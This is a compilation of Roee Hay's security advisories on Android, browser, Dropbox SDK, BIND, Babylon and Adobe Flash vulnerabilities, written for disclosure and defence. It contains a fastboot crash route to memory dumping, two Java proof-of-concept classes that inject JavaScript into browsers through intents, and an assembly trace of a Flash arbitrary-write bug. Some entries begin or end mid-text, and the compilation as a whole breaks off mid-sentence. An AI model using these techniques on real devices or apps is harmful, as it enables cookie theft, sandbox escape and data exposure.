Google Nexus 5X Bootloader Unauthorized Memory Dumping via USB

[Roee Hay]

Vulnerable versions:

Android 6.0.0 MDA89E through 6.0.1 MMB29V (bootloaders bhz10i/k)

Non-vulnerable versions:

Android 6.0.1 MHC19J (bootloader bhz10m) and above.

Details:
==
The attacker reboots the phone into the 'fastboot' mode. A physical
attacker can do this, without authorization, by pressing both the
'power' and 'volume down' buttons during device boot. An attacker with
an authorized ADB access can do this by issuing the 'adb reboot
bootloader' command. The fastboot mode exposes a USB interface, which,
on locked devices, must not allow any security-sensitive operation to
be commanded. However, we discovered that if the attacker issued the
'fastboot oem panic' command via the fastboot USB interface, the
bootloader would be forced to crash:

[38870] fastboot: oem panic
[38870] panic (frame 0xf9b1768):
[38870] r0 0x0f9972c4 r1 0x4e225c22 r2 0x7541206f r3 0x74206874
[38870] r4 0x0f9972e8 r5 0x0f96715c r6 0x0f9972f0 r7 0x0f9670ec
[38870] r8 0x0f92e070 r9 0x r10 0x r11 0x
[38870] r12 0x0f92e070 usp 0x0f9650ec ulr 0x pc 0x0f99c75c
[38870] spsr 0x0f936964
[38870] fiq r13 0x0f989490 r14 0x
[38870] irq r13 0x0f989490 r14 0x0f9004f4
[38870] svc r13 0x0f9b16f0 r14 0x0f92dd0c
[38870] und r13 0x0f989490 r14 0x
[38870] sys r13 0x r14 0x
[38880] panic (caller 0xf936964): generate test-panic

The problem is that in the vulnerable versions of the bootloader, such
a crash would cause the bootloader to expose a serial-over-USB
connection, which would allow an attacker to obtain a full memory dump
of the device using tools such as QPST Configuration. The resulting
memory dump files would then be available under the attacker’s PC.


More details are available at
https://securityintelligence.com/undocumented-patched-vulnerability-in-nexus-5X-allowed-for-memory-dumping-via-usb/

Vulnerability in the Dropbox SDK for Android (CVE-2014-8889)

[Roee Hay]

Hi,

We have recently discovered a vulnerability in the Dropbox SDK for
Android. This vulnerability may enable theft of sensitive information
from apps that use the vulnerable Dropbox SDK both locally by malware
and also remotely by using drive-by exploitation techniques.

The vulnerability is identified as CVE-2014-8889.

We had privately reported the issue to the Dropbox team which soon
provided a fix with version 1.6.2 of the SDK.

More details are available at:

1. Blog post: http://ibm.co/1Hosb02
2. Whitepaper: http://bit.ly/1BqEwjo
3. Video demo: http://bit.ly/1GklNFO

Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

[Roee Hay]

Hi,

We have discovered a stack-based buffer overflow in the Android
KeyStore service which affects Android 4.3 and below. The issue was
patched in Android 4.4.

The vulnerability is identified as CVE-2014-3100.

More details are available at:

1. Blog post: http://ibm.co/1pbk4yH
2. Advisory: http://slidesha.re/1nxBnmY

-Roee

Firefox for Android Profile Directory Derandomization and Data Exfiltration (CVE-2014-1484, CVE-2014-1506, CVE-2014-1515, CVE-2014-1516)

[Roee Hay]

Hi,

We have recently discovered a series of vulnerabilities in Firefox for Android
that allows a malicious application to successfully derandomize
the Firefox profile directory name in a practical amount of time
and then leak sensitive data (such as cookies and cached
information) which reside in that directory, breaking Android's
sandbox:

1. (CVE-2014-1516) Profile Directory Name Weak Randomization.
2. (CVE-2014-1484) Profile Directory Name Leaks to Android System Log.
3. (CVE-2014-1515) Automatic File Download to SD Card.
4. (CVE-2014-1506) Crash Reporter File Manipulation.

The full analysis with exploitation techniques can be found in our whitepaper.

Important links:

1. Blog post: http://bit.ly/1drYsZp
2. Whitepaper: http://slidesha.re/1gqiyD3


-Roee

Android Fragment Injection vulnerability

[Roee Hay]

Hi,

We have recently disclosed a new vulnerability to the Android Security
Team. The vulnerability affected many apps, including Settings (the
one that is found on every Android device), Gmail, Google Now, Dropbox
and Evernote. To be more accurate, any App which extended the
PreferenceActivity class using an exported activity was automatically
vulnerable. A patch has been provided in Android KitKat. If you
wondered why your code is now broken, it is due to the Android KitKat
patch which requires applications to override the new method,
PreferenceActivity.isValidFragment, which has been added to the
Android Framework.

Important links:
1. Blog post: http://ibm.co/1bAA8kF
2. Whitepaper: http://ibm.co/IDm2Es

Roee Hay
IBM Application Security Team Lead

Subverting BIND's SRTT Algorithm: Derandomizing NS Selection

[Roee Hay]

Hi,

BIND is exposed to a new vulnerability which can be exploited remotely
in order to derandomize the name server selection algorithm.
Exploitation of this vulnerability can be used in conjunction with
other off-path DNS cache poisoning exploits in order to make them more
efficient. ISC has acknowledged the vulnerability and plans to address
this deficiency by re-implementing the SRTT algorithm in future
maintenance releases of the BIND 9 code.

Important links:

1. Whitepaper: http://bit.ly/17LBSC1
2. Slides: http://bit.ly/17M3gj9
3. Blog post: http://ibm.co/17ntOIw
4. ISC's Operational Notification: http://bit.ly/1d3iR3z


-Roee

Advisory: Android SQLite Journal Information Disclosure (CVE-2011-3901)

[Roee Hay]

1 Background

Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, The Browser application holds sensitive information
such as cookies, cache and history, and this cannot be accessed by third-party
apps, while the Google Talk application stores contacts and conversations. An
android app may request specific privileges during its installation; if granted
by the user, the app's capabilities are extended.

One mechanism which Android uses in order to implement the sandbox, is running
each application as a separate process, and as a Linux user which is private to
the application's package. Running applications as different users makes files
owned by one application inaccessible to another (unless explicitly allowed).

At the application deployment phase, Android allocates the application a data
directory, identified by the application's package, under the /data/data path.

Android provides support for SQLite databases. Applications can create a private
database identified by name. Once created, the database is stored under the
/data/data/app package/databases directory, with the chosen name as
a filename.

The SQLite database engine maintains a rollback journal. When an application
changes the database, the original unchanged database is first copied to the
journal, and in case of a crash or a ROLLBACK action, the database can be
recovered. The journal has the same filename as the database itself, but with
a -journal suffix.

2 Vulnerability
===
The journal file of SQLite databases can be read by all applications:

* The application's data directory has execution rights for all users, up to the
root. This means that files with read or write permissions for all users, found
under the application's data directory are actually globally accessible.

* The /data/data/app package/databases directory is created with [rwxrwx--x]
permissions, meaning that files under that dir with global read or write
permissions, are globally readable or writable.

* The journal file is created under the databases directory with [-rw-r--r--]
permissions and therefore it can be read by all apps.

Conclusion: All databases maintained by Android's SQLite engine (unless named
with a random and unguessable string) can be leaked by malicious applications
without the need to declare adequate privileges. The databases can be leaked
during the lifetime of the journal file, (i.e. when the transaction is made).

3 Impact

A malicious app can eavesdrop on database activities performed by any other
application using SQLite, allowing unauthorized access to information such as
URL history, messages, and contacts.

4 Vulnerable versions
=
Android 2.3.7.

5 Non-vulnerable versions
=
Android 4.0.1.

6 Credit

Discovered by Roee Hay ro...@il.ibm.com

7 Acknowledgments
=
We would like to thank the Android Security Team for the efficient way in which
they handled this security issue.

8 References

* Full advisory with PoC. http://bit.ly/K0W0pT
* Blog post. http://bit.ly/JEThEf
* Video demonstration. http://youtu.be/oCXLHjmH5rY

Advisory: Opera Mobile Cache Poisoning XAS

[Roee Hay]

[] buffer = new byte[1024];
int len = -1;
while (-1 != (len = input.read(buffer)))
 output.write(buffer, 0, len);

output.close();
input.close();  

} catch (IOException e) {}



File f = new File(dstPath);
f.setReadable(true, false);
f.setWritable(true, false); 

}

}

6 Vulnerable versions
=
Opera Mobile 11.1 has been found vulnerable.

7 Vendor response
=
Opera Mobile 11.1 update 2 has been released, which incorporates a fix for this
bug.

8 Credit

Roee Hay ro...@il.ibm.com

9 Acknowledgements
==
We would like to thank the Opera team for the efficient and quick way in which
it handled this security issue.

10 References
=
• Original advisory: http://blog.watchfire.com/files/advisory-opera-cp-xas.pdf
• Blog post: 
http://blog.watchfire.com/wfblog/2011/09/opera-mobile-cache-poisoning-xas.html
• Video of the PoC: http://youtu.be/8fWZh5jwFfE
• Android 11.1 update 2 ready for download: http://bit.ly/android-11-1-update-2

Advisory: Dolphin Browser HD Cross-Application Scripting

[Roee Hay]

1 Background

Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, the Dolphin browser application holds sensitive
information such as cookies, cache and history, and this cannot be accessed
by third-party apps. An android app may request specific privileges during
its installation; if granted by the user, the app's capabilities are extended.

Intents are used by Android apps for intercommunication. These objects can be
broadcast, passed to the startActivity call (when an application starts another
activity), or passed to the startService call (when an application starts a
service). Normally, when startActivity is called, the target activity's
onCreate method is executed. However, under AndroidManifest.xml it is possible
to define different launch tags, which affect this behavior. One example is the
singleTask launch tag, which makes the activity act as a singleton. This affects
the startActivity call: if the activity has already been started when the call
is made, the activity's onNewIntent member function is called instead of its
onCreate method.

2 Vulnerability
===
A 3rd party application may exploit Dolphin Browser HD's URL loading process in
order to inject JavaScript code into an arbitrary domain thus break Android's
sandboxing. This can be done by sending two consecutive startActivity calls. The
first call includes the attacked domain, and causes Dolphin Browser HD to load
it, while the second call contains JavaScript code. the JavaScript URI will be
opened under the current tab, i.e. the attacked domain.

3 Impact

By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of any domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Additionally, an application may
install itself as a service, in order to inject JavaScript code from time to
time into the currently opened tab, thus completely intercepting the user's
browsing experience.

4 Proof-of-Concept
==
The following is a PoC for the second technique:

public class CasExploit extends Activity
{
  static final String mPackage = mobi.mgeek.TunnyBrowser;
  static final String mClass =  BrowserActivity;
  static final String mUrl = http://target.domain/;;
  static final String mJavascript = alert(document.cookie);
  static final int mSleep = 15000;

  @Override
  public void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.main);
  startBrowserActivity(mUrl);
  try {
  Thread.sleep(mSleep);
  }
  catch (InterruptedException e) {}
  startBrowserActivity(javascript: + mJavascript);

  }

  private void startBrowserActivity(String url) {
  Intent res = new Intent(android.intent.action.VIEW);
  res.setComponent(new ComponentName(mPackage,mPackage+.+mClass));
  res.setData(Uri.parse(url));
  startActivity(res);
  }

}

5 Vulnerable versions
=
Dolphin Browser HD 6.0.0 has been found vulnerable.

6 Vendor Response
=
Dolphin Browser HD 6.1.0 has been released to Android Market, which incorporates
a fix for this bug.

8 Credit

* Roee Hay ro...@il.ibm.com
* Yair Amit yai...@gmail.com

9 References

* Original advisory: http://blog.watchfire.com/files/advisory-dolphin.pdf
* Blog post:
  
http://blog.watchfire.com/wfblog/2011/09/dolphin-browser-hd-cross-application-scripting.html
* Demo of the PoC: http://youtu.be/1E0GzZPdpLM
* Android Browser Cross-Application Scripting (CVE-2011-2357):
  http://blog.watchfire.com/files/advisory-android-browser.pdf

10 Acknowledgments
==
We would like to thank the Dolphin Browser team for the efficient and quick way
in which it handled this security issue.

Android Browser Cross-Application Scripting (CVE-2011-2357)

[Roee Hay]

 the current tab, i.e. the
   attacked domain.


4) Impact
--
By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of any domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Additionally, an application may
install itself as a service, in order to inject JavaScript code from time to
time into the currently opened tab, thus completely intercepting the user's
browsing experience.


5) Proof-of-Concept

The following is a PoC for the second technique:

public class CasExploit extends Activity
{
   static final String mPackage = com.android.browser;
   static final String mClass = BrowserActivity;
   static final String mUrl = http://target.domain/;;
   static final String mJavascript = alert(document.cookie);
   static final int mSleep = 15000;

   @Override
   public void onCreate(Bundle savedInstanceState) {
  super.onCreate(savedInstanceState);
  setContentView(R.layout.main);
  startBrowserActivity(mUrl);
 try {
 Thread.sleep(mSleep);
 }
 catch (InterruptedException e) {}
 startBrowserActivity(javascript: + mJavascript);
   }

   private void startBrowserActivity(String url) {
  Intent res = new Intent(android.intent.action.VIEW);
  res.setComponent(new ComponentName(mPackage,mPackage+.+mClass));
  res.setData(Uri.parse(url));
  startActivity(res);
   }
}


6) Vulnerable versions
---
Android 2.3.4 and Android 3.1 have been found vulnerable.


7) Vendor Response
---
Android 2.3.5 and 3.2 have been released, which incorporate a fix for this bug.

The fixes can be found in the following commits:
* 
http://android.git.kernel.org/?p=platform/packages/apps/Browser.git;a=commit;h=afa4ab1e4c1d645e34bd408ce04cadfd2e5dae1e
* 
http://android.git.kernel.org/?p=platform/packages/apps/Browser.git;a=commit;h=096bae248453abe83cbb2e5a2c744bd62cdb620b

Patches are available for Android 2.2.* and will be released at a later date.
Organizations can contact secur...@android.com for patch information.

Android has communicated information about this vulnerability to their
partners, and all new Android compatible devices are required to
incorporate this bug fix:
* http://source.android.com/compatibility/overview.html
* http://source.android.com/faqs.html#compatibility
* 
http://android.git.kernel.org/?p=platform/cts.git;a=commit;h=7e48fb87d48d27e65942b53b7918288c8d740e17

Android Market actively scans all Android Market applications to detect and
prevent exploitation of security vulnerabilities.


8) Additional information
--
* Original advisory:
http://blog.watchfire.com/files/advisory-android-browser.pdf
* Demo of PoC:   http://www.youtube.com/watch?v=BzUpbcrWufs


9) Credit
--
* Roee Hay ro...@il.ibm.com of IBM Rational Application Security
Research Group
* Yair Amit yai...@gmail.com


10) Acknowledgments

We would like to thank the Android Security Team for the efficient and quick
way in which they handled this security issue.

Babylon Cross-Application Scripting Code Execution

[Roee Hay]

Introduction

Babylon is a single-click computer online dictionary and translation
software
which is also capable of translating whole documents and web pages. The
translation and dictionary results are presented to the user via the
Trident
layout engine (an in-app/embedded Internet-Explorer rendering engine).

Vulnerability
=
Babylon fails to sanitize user input before rendering it on the Trident
control,
effectively leading to a Cross-Application Scripting vulnerability.

The user's input can originate from the following sources:

1. Babylon's main translation interface: When searching for a non-existent
   term Babylon pushes the string No matches were found for 'non-existent
   term'. Search the web for non-existent-term. Unfortunately,
'non-existent
   term' is not HTML encoded or validated before it is written on the
embedded
   browser (the translation process transparently validates translatable
input).

2. Document translation: Documents (such as PDF files) may contain text
which
   cannot be translated (e,g. JavaScript code), in such case it is rendered
   without HTML encoding or validation.

3. Web site translation: Same as the document translation case. Text which
is
   not translated is simply rendered on the Trident control. In order to
trigger
   an attack, the victim has to be lured into translating malicious text,
either
   in a document or on a web page. Although the scenarios require some
   social-engineering, some of them are feasible and realistic.

Impact
==
The Trident control runs in Local Machine Zone (LMZ) which is not Locked
down.

This allows a malicious script to perform the following actions:

1. Interact with other websites in the background while using persistent
cookies
   to impersonate the victim: This can be done using XHR. The payload can
leak
   the response's body which may contain sensitive information in case the
   victim has been authenticated on the site prior to the attack. The
payload
   can also perform actions on the site on behalf of the victim.

2. Collect information from local files: This can be done using XHR or by a
   hidden iframe with the filename's as the source. Since the payload runs
in a
   non-Locked-down LMZ, the XHR response or iframe's body can be inspected
and
   sent back to the attacker.

3. Code execution: System commands can be executed by using the
Wscript.Shell
   ActiveX object to practically take over the whole system.

Vulnerable versions
===
Versions prior to 8.0.7 are susceptible to this vulnerability.

Credit
==
Yair Amit amity...@il.ibm.com
Roee Hay ro...@il.ibm.com

Acknowledgments
===
We would like to thank the Babylon team for their quick responses and the
efficient way in which they handled this security issue.

References
==
1. Original advisory:
   http://blog.watchfire.com/files/babylon_cas_advisory.pdf
2. Blog post:

http://blog.watchfire.com/wfblog/2010/11/babylon-cross-application-scripting.html

3. Demo:
   http://www.youtube.com/watch?v=51ypgI1lqzE
4. Babylon's homepage:
   http://www.babylon.com/
5. Enhanced Browsing Security:
   http://technet.microsoft.com/en-us/library/bb457150.aspx

Advisory: Adobe Flash Player and AIR AVM2 intf_count Integer Overflow Remote Code Execution (CVE-2009-1869)

[Roee Hay]

Background:
==
ActionScript code is compiled into ActionScript Byte Code segments,
loaded by AVM2 (ActionScript Virtual Machine 2).
These segments are described by the abcFile structure:

   abcFile
   {
   u16 minor_version
   u16 major_version
   cpool_info constant_pool
   u30 method_count
   method_info method[method_count]
   u30 metadata_count
   metadata_info metadata[metadata_count]
   u30 class_count
   instance_info instance[class_count]
   class_info class[class_count]
   u30 script_count
   script_info script[script_count]
   u30 method_body_count
   method_body_info method_body[method_body_count]
   }

The value of class_count element is the number of entries in the
instance and class arrays.
Each instance entry is a variable length instance_info structure which
specifies the
characteristics of object instances created by a particular class:

   instance_info
   {
   u30 name
   u30 super_name
   u8 flags
   u30 protectedNs
   u30 intrf_count
   u30 interface[intrf_count]
   u30 iinit
   u30 trait_count
   traits_info trait[trait_count]
   }

The value of the intrf_count field is the number of entries in the
interface array.
The interface array contains indices into the multiname array of the
constant pool;
the referenced names specify the interfaces implemented by this class.


Vulnerability:
=
An integer overflow exists in the AVM2 abcFile parser code which handles the
intrf_count value of the instance_info structure.

When intrf_count is larger than 0x1000, it is nullified due to an
integer overflow.
This results in an out of bounds pointer dereference. The out of
bounds object contains
arbitrary values (in the context of the code which handles the
interfaces count element)
which are manipulated in a way so that an arbitrary memory overwrite
with an attacker
supplied destination and value is possible.

The following is a detailed run trace which explains the
vulnerability. Irrelevant
instructions are omitted. Flash10b.ocx is assumed to be loaded at VA 1000h.

   let intrf_count be 0x1000

.text:10206B03  mov  edi, [esp+50h+var_2C] ; EDI=intrf_count=0x1000
.text:10206B14  lea  edx, [edi+edi];
EDX=intrf_count*2=0x2000, may not overflow (verified elsewhere)
.text:10206B1B  call  sub_101EAC30
.text:101EAC45  call  sub_101EAB90
.text:101EAB98  call  sub_101D1FF0 ; this method calculates
the nearest power of 2 for intrf_count*2  (i.e: stays 0x2000)
.text:101EABA0  add  eax, eax  ; doubles that value (i.e:
EAX=0x4000)
.text:101EABCC  lea  ecx, ds:0[eax*4]  ; multiplies it by 4 (i.e:
ECX=0x) =OVERFLOW=
.text:101EABDA  call  sub_10224C62
.text:10224C62  jmp   sub_10224363
.text:10224363  mov   edx, [esp+arg_0] ; arg_0 is the overflown
value (i.e: EDX=)
.text:10224367  lea eax, [edx+7]
.text:10224376  and eax, 0FFF8h; EAX=
.text:1022437A  mov esi, eax   ; ESI=
.text:102243A4  mov ecx, esi   ; ECX=
.text:102243A9  mov eax, [eax+ecx*4-4]
; the overflown value is used as an index into pointer table, starting at EAX.
; since we can cause ECX to become 0x000, we may select an out of bounds
; pointer (eax-4). Tests show that it always contains a valid pointer to some
; object, with arbitrary values. i.e: EAX=OutOfBoundsObject
.text:102243AD  mov ecx, eax   ; ECX=OutOfBoundsObject
.text:102243C8  callsub_10226D4D
.text:10226D53  mov ebx, ecx   ; EBX=OutOfBoundsObject
.text:10226D6C  mov esi, [ebx+8]   ; ESI=ArbitraryObjectA
(usually: 0x)
.text:10226D76  testbyte ptr [esi+2Ah], 1  ; PathConditionA -
must pass this in order to continue
.text:10226D7A  jz  short loc_10226DA5
.text:10226D7C  mov eax, [ebx+38h] ;
EAX=ArbitraryObjectB, (usually 0x5557)
.text:10226D7F  cmp byte ptr [eax+33Ch], 0 ; PathConditionB -
must pass this in order to continue
.text:10226D86  mov ecx, ebx   ; ECX=OutOfBoundsObject
.text:10226D88  jnz short loc_10226D9D
.text:10226D8A  pushesi
.text:10226D8B  callsub_10226CAF
.text:10226CB0  mov esi, [esp+4+arg_0] ;
ESI=ArbitraryObjectA, (usually 0x)
.text:10226CB5  pushesi
.text:10226CB6  mov edi, ecx   ; EDI=OutOfBoundsObject
.text:10226CB8  callsub_102266CA
.text:102266CA  mov eax, [esp+arg_0]   ;
EAX=ESI=ArbitraryObjectA (usually 0x)
.text:102266DB  mov ecx, [eax+1Ch] ; ECX=arbitrary value
- usually *(0x5571)
.text:102266CE  mov edx, [eax+20h] ; EDX=arbitrary value
- usually *(0x5575)
.text:102266DE  mov [ecx+20h], edx;; JACKPOT - a write of
an arbitrary DWORD to an arbitrary VA


The following is an